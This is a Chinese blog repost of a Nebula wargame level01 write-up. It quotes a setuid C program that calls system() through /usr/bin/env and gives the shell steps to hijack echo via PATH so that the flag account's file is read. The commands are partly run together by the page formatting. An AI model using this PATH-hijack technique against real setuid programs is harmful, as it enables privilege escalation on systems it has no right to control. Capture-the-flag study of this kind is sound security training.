i春秋
来源:互联网 发布:神仙劫神翼进阶数据 编辑:程序博客网 时间:2024/05/16 19:08
About
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.
Source code
#include <stdlib.h>#include <unistd.h>#include <string.h>#include <sys/types.h>#include <stdio.h>int main(int argc, char **argv, char **envp){ gid_t gid; uid_t uid; gid = getegid(); uid = geteuid(); setresgid(gid, gid, gid); setresuid(uid, uid, uid); system("/usr/bin/env echo and now what?");}
Nebula官网
思路
覆盖环境变量PATH中的echo命令
cd /tmpvim echo
cat /home/flag01/flag
chmod 755 echoPATH=/tmp:$PATH/home/flag01/flag01
0 0
- i春秋
- i春秋
- i春秋
- i春秋
- i春秋
- i春秋
- i春秋
- i春秋之戏说春秋
- i春秋之春秋争霸
- 171220 逆向-i春秋【***】-******
- 171221 杂项-i春秋【***】-***
- i春秋的戏说春秋writeup
- WP 4 i春秋_细说春秋
- WP 4 i春秋_春秋争霸
- WP 4 i春秋_2017年春秋欢乐赛
- i春秋:无处不在的SQL注入
- i春秋php代码审计-xss漏洞
- WP 4 i春秋_internetwache-ctf-2016
- Sum Problem
- mysql5.7.17-win64 的3534问题
- OpenGL核心技术之Shadow Mapping改进版
- C# clone
- 使用IntelliJ IDEA 15和Maven创建Java Web项目
- i春秋
- Manacher马拉车算法求最长回文子串
- Android 获取浏览器当前分享页面的截屏
- java基础目录
- JavaScript学习笔记-第三章
- vue.js学习笔记之属性绑定 v-bind
- 32位的Windows系统与64位的虚拟机
- SQL Server
- 202. Happy Number